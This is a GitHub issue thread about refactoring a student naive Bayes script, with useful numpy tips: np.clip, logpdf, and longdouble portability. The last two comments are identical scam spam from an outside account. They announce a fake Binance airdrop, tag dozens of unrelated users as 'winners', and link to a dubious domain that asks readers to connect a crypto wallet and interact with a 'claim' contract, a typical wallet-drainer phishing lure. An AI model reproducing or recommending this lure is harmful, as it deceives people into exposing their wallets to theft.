### ISSUE TITLE
Cleanup bayes.py

### ISSUE THREAD

**Issue by Danc2050** [Danc2050/CS545-Final-Project#3]
Make the `def main` more modular and readable.

**Comment by Danc2050** [comment]
Also optimize bayes:

Change `nb` function to use `scipy.norm.pdf`. This preserves precision and is vectorized for numpy. 

Also change out normal logs to use scipy.norm.logpdf that takes the logarithm (base e).

Thanks to Dalton for these suggestions.

**Comment by daltonbohning** [comment]
Another suggestions I have:
```
for i in range(len(bad_stddev)):
        if bad_stddev[i] == 0:
           #print(bad_stddev[i])                                                                                                    
           bad_stddev[i] = min_std_dev # Set any 0 std dev to min_std_dev to avoid divide by zero error
```
This can also be accomplished with:
`bad_stddev[bad_stddev == 0] = min_std_dev`
Or:
`bad_stddev= np.clip(bad_stddev, min_std_dev, None)`

**Comment by Danc2050** [comment]
Just learned about that == trick. Even sweeter, `np.clip`! Very cool.

I added the `clip` implementation. I also changed the ratios and put in comments about how I split the data (a 3:1 ratio) and removed some of the test code. Basically the model is averaging around 78% for accuracy.

**Comment by daltonbohning** [comment]
Yeah, I happened to stumble across that in the docs. I do think `clip` is more efficient, as the `==` deals with array slicing, etc., but I'm not entirely sure. Glad you appreciate it!

**Comment by daltonbohning** [comment]
Another thing I just noticed...
`np.float128` is implementation independent, and therefore not compatible with every system.
`'longdouble'` will be cast down from 128 in this case:
`dtype='longdouble'`

**Comment by Danc2050** [comment]
Ha, your intuition is probably right. It seems like the general principle is numpy is faster since it written in the C and/or C++.

Oh interesting! That is odd that is not the suggested `dtype` in their documentation. I feel like that would be a good suggestion in their GitHub issues form.

Thanks. I'm trying to finish up my programming assignment tonight (ha.ha..ha..), but I'll try and get to the first round of suggestions you made and then add in the longdouble next.

**Comment by daltonbohning** [comment]
Nice!
From this page of the docs (https://docs.scipy.org/doc/numpy/user/basics.types.html):
"MSVC (standard for Windows builds) makes long double identical to double (64 bits). NumPy makes the compiler’s long double available as np.longdouble."
Meaning, most windows systems only support 64 bits. It looks like you can use `dtype=np.longdouble` instead of `dtype='longdouble'`

I happened upon this because my windows desktop yelled at me about np.float128 not being defined :(

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @Cujef, @mikmir64, @jimjimmiejames, @bjmoonn, @SinuxLee, @zetenyhorvath, @kyzh, @htyeim, @bml0aGlu, @atovk, @ovidyou, @jitenderbhushanjaggi, @kanzaki1201, @ShwethaKalyanaraman, @ionabio, @dalu19, @HaigCode, @Iraiva63, @Giopa05, @timiles, @barton222, @marciobr20, @harryleee, @fodorutioan, @joaocunha, @cr105ph1nx, @Maihaja, @IndigoNakamoto, @vtereshyn, @satya-kodukula, @Nikola356, @13ANM, @prehensilecode, @RedDash16, @liamgriffiths, @MatthK, @icls1337, @Deriec, @mosthighness, @0xAVX, @tommm88, @pwittchen, @chrielous, @exec-life, @cjude62, @WhitebladeAliva, @felipelalli, @kdpatel007, @nerdius, @b1tetheapple

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @rizkyaners, @qingnichitang, @BitFlippa27, @sully352, @johynpapin, @cracker8090, @griffygit, @0x4n6, @mnn888, @vospader13, @fatmaaalzharaa445, @Corista14, @Cybertron3, @BredeFK, @uvim, @dotdwebo, @heropoo, @nomad-cat, @CardboardAgent, @diakoptis, @ravirathore, @finngaida, @racheldotey, @Gictorbit, @GarrettPilgrim, @gyt1007, @connorads, @teeSee, @MertArkin, @mathewsun, @j0hannr, @ruany, @travelhawk, @0xhardman, @primelyw, @emillium, @shin4141, @yiuked, @volatilegg, @jimmy54, @imightbeinatree, @bhanukaManesha, @0xacn, @tzdanows, @EhsanAramide, @abduld, @jmingov, @dgs2019, @rskn, @MWjie
